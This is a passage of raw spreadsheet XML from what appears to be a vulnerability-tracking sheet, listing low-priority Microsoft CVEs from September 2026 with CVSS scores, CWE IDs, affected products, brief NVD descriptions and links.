r="A1283" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1283" s="5" t="inlineStr"><is><t>CVE-2026-69684</t></is></c><c r="D1283" s="5" t="n"><v>5.5</v></c><c r="E1283" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1283" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1283" s="5" t="inlineStr" /><c r="H1283" s="5" t="n"><v>0.005</v></c><c r="I1283" s="5" t="inlineStr" /><c r="J1283" s="5" t="inlineStr" /><c r="K1283" s="5" t="inlineStr" /><c r="L1283" s="5" t="inlineStr" /><c r="M1283" s="5" t="inlineStr" /><c r="N1283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1283" s="5" t="inlineStr" /><c r="R1283" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1283" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Error Reporting allows an authorized attacker to disclose information locally.</t></is></c><c r="T1283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69684</t></is></c></row><row r="1284"><c r="A1284" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1284" s="5" t="inlineStr"><is><t>CVE-2026-69741</t></is></c><c r="D1284" s="5" t="n"><v>5.5</v></c><c r="E1284" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1284" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1284" s="5" t="inlineStr" /><c r="H1284" s="5" t="n"><v>0.004</v></c><c r="I1284" s="5" t="inlineStr" /><c r="J1284" s="5" t="inlineStr" /><c r="K1284" s="5" t="inlineStr" /><c r="L1284" s="5" t="inlineStr" /><c r="M1284" s="5" t="inlineStr" /><c r="N1284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1284" s="5" t="inlineStr" /><c r="R1284" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1284" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69741</t></is></c></row><row r="1285"><c r="A1285" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1285" s="5" t="inlineStr"><is><t>CVE-2026-69770</t></is></c><c r="D1285" s="5" t="n"><v>5.5</v></c><c r="E1285" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1285" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1285" s="5" t="inlineStr" /><c r="H1285" s="5" t="n"><v>0.004</v></c><c r="I1285" s="5" t="inlineStr" /><c r="J1285" s="5" t="inlineStr" /><c r="K1285" s="5" t="inlineStr" /><c r="L1285" s="5" t="inlineStr" /><c r="M1285" s="5" t="inlineStr" /><c r="N1285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1285" s="5" t="inlineStr" /><c r="R1285" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1285" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69770</t></is></c></row><row r="1286"><c r="A1286" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1286" s="5" t="inlineStr"><is><t>CVE-2026-69794</t></is></c><c r="D1286" s="5" t="n"><v>5.5</v></c><c r="E1286" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1286" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1286" s="5" t="inlineStr" /><c r="H1286" s="5" t="n"><v>0.004</v></c><c r="I1286" s="5" t="inlineStr" /><c r="J1286" s="5" t="inlineStr" /><c r="K1286" s="5" t="inlineStr" /><c r="L1286" s="5" t="inlineStr" /><c r="M1286" s="5" t="inlineStr" /><c r="N1286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1286" s="5" t="inlineStr" /><c r="R1286" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1286" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Encrypting File System (EFS) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69794</t></is></c></row><row r="1287"><c r="A1287" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1287" s="5" t="inlineStr"><is><t>CVE-2026-69808</t></is></c><c r="D1287" s="5" t="n"><v>5.5</v></c><c r="E1287" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1287" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1287" s="5" t="inlineStr" /><c r="H1287" s="5" t="n"><v>0.004</v></c><c r="I1287" s="5" t="inlineStr" /><c r="J1287" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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87" s="5" t="inlineStr" /><c r="M1287" s="5" t="inlineStr" /><c r="N1287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1287" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1287" s="5" t="inlineStr" /><c r="R1287" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1287" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t></is></c></row><row r="1288"><c r="A1288" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1288" s="5" t="inlineStr"><is><t>CVE-2026-69862</t></is></c><c r="D1288" s="5" t="n"><v>5.5</v></c><c r="E1288" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1288" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1288" s="5" t="inlineStr" /><c r="H1288" s="5" t="n"><v>0.005</v></c><c r="I1288" s="5" t="inlineStr" /><c r="J1288" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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88" s="5" t="inlineStr" /><c r="M1288" s="5" t="inlineStr" /><c r="N1288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1288" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1288" s="5" t="inlineStr" /><c r="R1288" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S1288" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t></is></c></row><row r="1289"><c r="A1289" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1289" s="5" t="inlineStr"><is><t>CVE-2026-70145</t></is></c><c r="D1289" s="5" t="n"><v>5.5</v></c><c r="E1289" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1289" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1289" s="5" t="inlineStr" /><c r="H1289" s="5" t="n"><v>0.004</v></c><c r="I1289" s="5" t="inlineStr" /><c r="J1289" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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89" s="5" t="inlineStr" /><c r="M1289" s="5" t="inlineStr" /><c r="N1289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1289" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1289" s="5" t="inlineStr" /><c r="R1289" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1289" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t></is></c></row><row r="1290"><c r="A1290" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1290" s="5" t="inlineStr"><is><t>CVE-2026-70290</t></is></c><c r="D1290" s="5" t="n"><v>5.5</v></c><c r="E1290" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1290" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1290" s="5" t="inlineStr" /><c r="H1290" s="5" t="n"><v>0.004</v></c><c r="I1290" s="5" t="inlineStr" /><c r="J1290" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K129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90" s="5" t="inlineStr" /><c r="M1290" s="5" t="inlineStr" /><c r="N1290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1290" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1290" s="5" t="inlineStr" /><c r="R1290" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1290" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t></is></c><c r="T1290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t></is></c></row><row r="1291"><c r="A1291" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1291" s="5" t="inlineStr"><is><t>CVE-2026-71341</t></is></c><c r="D1291" s="5" t="n"><v>5.5</v></c><c r="E1291" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1291" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1291" s="5" t="inlineStr" /><c r="H1291" s="5" t="n"><v>0.004</v></c><c r="I1291" s="5" t="inlineStr" /><c r="J1291" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1291"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91" s="5" t="inlineStr" /><c r="M1291" s="5" t="inlineStr" /><c r="N1291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1291" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1291" s="5" t="inlineStr" /><c r="R1291" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1291" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t></is></c></row><row r="1292"><c r="A1292" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1292" s="5" t="inlineStr"><is><t>CVE-2026-72937</t></is></c><c r="D1292" s="5" t="n"><v>5.5</v></c><c r="E1292" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1292" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1292" s="5" t="inlineStr" /><c r="H1292" s="5" t="n"><v>0.004</v></c><c r="I1292" s="5" t="inlineStr" /><c r="J1292" s="5" t="inlineStr" /><c r="K1292" s="5" t="inlineStr" /><c r="L1292" s="5" t="inlineStr" /><c r="M1292" s="5" t="inlineStr" /><c r="N1292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1292" s="5" t="inlineStr" /><c r="R1292" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1292" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72937</t></is></c></row><row r="1293"><c r="A1293" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1293" s="5" t="inlineStr"><is><t>CVE-2026-72945</t></is></c><c r="D1293" s="5" t="n"><v>5.5</v></c><c r="E1293" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1293" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1293" s="5" t="inlineStr" /><c r="H1293" s="5" t="n"><v>0.004</v></c><c r="I1293" s="5" t="inlineStr" /><c r="J1293" s="5" t="inlineStr" /><c r="K1293" s="5" t="inlineStr" /><c r="L1293" s="5" t="inlineStr" /><c r="M1293" s="5" t="inlineStr" /><c r="N1293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1293" s="5" t="inlineStr" /><c r="R1293" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1293" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Task Scheduler allows an authorized attacker to disclose information locally.</t></is></c><c r="T1293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72945</t></is></c></row><row r="1294"><c r="A1294" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1294" s="5" t="inlineStr"><is><t>CVE-2026-72964</t></is></c><c r="D1294" s="5" t="n"><v>5.5</v></c><c r="E1294" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1294" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1294" s="5" t="inlineStr" /><c r="H1294" s="5" t="n"><v>0.003</v></c><c r="I1294" s="5" t="inlineStr" /><c r="J1294" s="5" t="inlineStr" /><c r="K1294" s="5" t="inlineStr" /><c r="L1294" s="5" t="inlineStr" /><c r="M1294" s="5" t="inlineStr" /><c r="N1294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1294" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1294" s="5" t="inlineStr" /><c r="R1294" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1294" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Internet Connection Sharing (ICS) allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72964</t></is></c></row><row r="1295"><c r="A1295" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1295" s="5" t="inlineStr"><is><t>CVE-2026-72966</t></is></c><c r="D1295" s="5" t="n"><v>5.5</v></c><c r="E1295" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1295" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1295" s="5" t="inlineStr" /><c r="H1295" s="5" t="n"><v>0.003</v></c><c r="I1295" s="5" t="inlineStr" /><c r="J1295" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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295" s="5" t="inlineStr" /><c r="M1295" s="5" t="inlineStr" /><c r="N1295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1295" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1295" s="5" t="inlineStr" /><c r="R1295" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1295" s="5" t="inlineStr"><is><t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t></is></c></row><row r="1296"><c r="A1296" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1296" s="5" t="inlineStr"><is><t>CVE-2026-72980</t></is></c><c r="D1296" s="5" t="n"><v>5.5</v></c><c r="E1296" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1296" s="5" t="inlineStr" /><c r="H1296" s="5" t="n"><v>0.003</v></c><c r="I1296" s="5" t="inlineStr" /><c r="J1296" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1296"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96" s="5" t="inlineStr" /><c r="M1296" s="5" t="inlineStr" /><c r="N1296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1296" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1296" s="5" t="inlineStr" /><c r="R1296" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="S1296" s="5" t="inlineStr"><is><t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t></is></c></row><row r="1297"><c r="A1297" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1297" s="5" t="inlineStr"><is><t>CVE-2026-73004</t></is></c><c r="D1297" s="5" t="n"><v>5.5</v></c><c r="E1297" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1297" s="5" t="inlineStr" /><c r="H1297" s="5" t="n"><v>0.002</v></c><c r="I1297" s="5" t="inlineStr" /><c r="J1297" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1297" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1297" s="5" t="inlineStr" /><c r="M1297" s="5" t="inlineStr" /><c r="N1297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1297" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1297" s="5" t="inlineStr" /><c r="R1297" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1297" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t></is></c></row><row r="1298"><c r="A1298" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1298" s="5" t="inlineStr"><is><t>CVE-2026-73008</t></is></c><c r="D1298" s="5" t="n"><v>5.5</v></c><c r="E1298" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1298" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1298" s="5" t="inlineStr" /><c r="H1298" s="5" t="n"><v>0.005</v></c><c r="I1298" s="5" t="inlineStr" /><c r="J1298" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1298"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298" s="5" t="inlineStr" /><c r="M1298" s="5" t="inlineStr" /><c r="N1298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1298" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1298" s="5" t="inlineStr" /><c r="R1298" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1298" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t></is></c></row><row r="1299"><c r="A1299" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1299" s="5" t="inlineStr"><is><t>CVE-2026-77488</t></is></c><c r="D1299" s="5" t="n"><v>5.5</v></c><c r="E1299" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1299" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1299" s="5" t="inlineStr" /><c r="H1299" s="5" t="n"><v>0.003</v></c><c r="I1299" s="5" t="inlineStr" /><c r="J1299" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1299" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1299" s="5" t="inlineStr" /><c r="M1299" s="5" t="inlineStr" /><c r="N1299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1299" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1299" s="5" t="inlineStr" /><c r="R1299" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1299" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t></is></c></row><row r="1300"><c r="A1300" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1300" s="5" t="inlineStr"><is><t>CVE-2026-77491</t></is></c><c r="D1300" s="5" t="n"><v>5.5</v></c><c r="E1300" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1300" s="5" t="inlineStr" /><c r="H1300" s="5" t="n"><v>0.004</v></c><c r="I1300" s="5" t="inlineStr" /><c r="J1300" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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300" s="5" t="inlineStr" /><c r="M1300" s="5" t="inlineStr" /><c r="N1300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1300" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1300" s="5" t="inlineStr" /><c r="R1300" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1300" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t></is></c></row><row r="1301"><c r="A1301" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1301" s="5" t="inlineStr"><is><t>CVE-2026-77492</t></is></c><c r="D1301" s="5" t="n"><v>5.5</v></c><c r="E1301" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1301" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1301" s="5" t="inlineStr" /><c r="H1301" s="5" t="n"><v>0.003</v></c><c r="I1301" s="5" t="inlineStr" /><c r="J1301" s="5" t="inlineStr" /><c r="K1301" s="5" t="inlineStr" /><c r="L1301" s="5" t="inlineStr" /><c r="M1301" s="5" t="inlineStr" /><c r="N1301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1301" s="5" t="inlineStr" /><c r="R1301" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1301" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77492</t></is></c></row><row r="1302"><c r="A1302" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1302" s="5" t="inlineStr"><is><t>CVE-2026-78454</t></is></c><c r="D1302" s="5" t="n"><v>5.5</v></c><c r="E1302" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1302" s="5" t="inlineStr" /><c r="H1302" s="5" t="n"><v>0.004</v></c><c r="I1302" s="5" t="inlineStr" /><c r="J1302" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1302"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302" s="5" t="inlineStr" /><c r="M1302" s="5" t="inlineStr" /><c r="N1302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1302" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1302" s="5" t="inlineStr" /><c r="R1302" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1302" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t></is></c></row><row r="1303"><c r="A1303" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1303" s="5" t="inlineStr"><is><t>CVE-2026-78506</t></is></c><c r="D1303" s="5" t="n"><v>5.5</v></c><c r="E1303" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1303" s="5" t="inlineStr" /><c r="H1303" s="5" t="n"><v>0.005</v></c><c r="I1303" s="5" t="inlineStr" /><c r="J1303" s="5" t="inlineStr" /><c r="K1303" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1303" s="5" t="inlineStr" /><c r="M1303" s="5" t="inlineStr" /><c r="N1303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1303" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1303" s="5" t="inlineStr" /><c r="R1303" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S1303" s="5" t="inlineStr"><is><t>Improper null termination in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78506</t></is></c></row><row r="1304"><c r="A1304" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1304" s="5" t="inlineStr"><is><t>CVE-2026-78513</t></is></c><c r="D1304" s="5" t="n"><v>5.5</v></c><c r="E1304" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1304" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1304" s="5" t="inlineStr" /><c r="H1304" s="5" t="n"><v>0.005</v></c><c r="I1304" s="5" t="inlineStr" /><c r="J1304" s="5" t="inlineStr" /><c r="K1304" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1304" s="5" t="inlineStr" /><c r="M1304" s="5" t="inlineStr" /><c r="N1304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1304" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1304" s="5" t="inlineStr" /><c r="R1304" s="5" 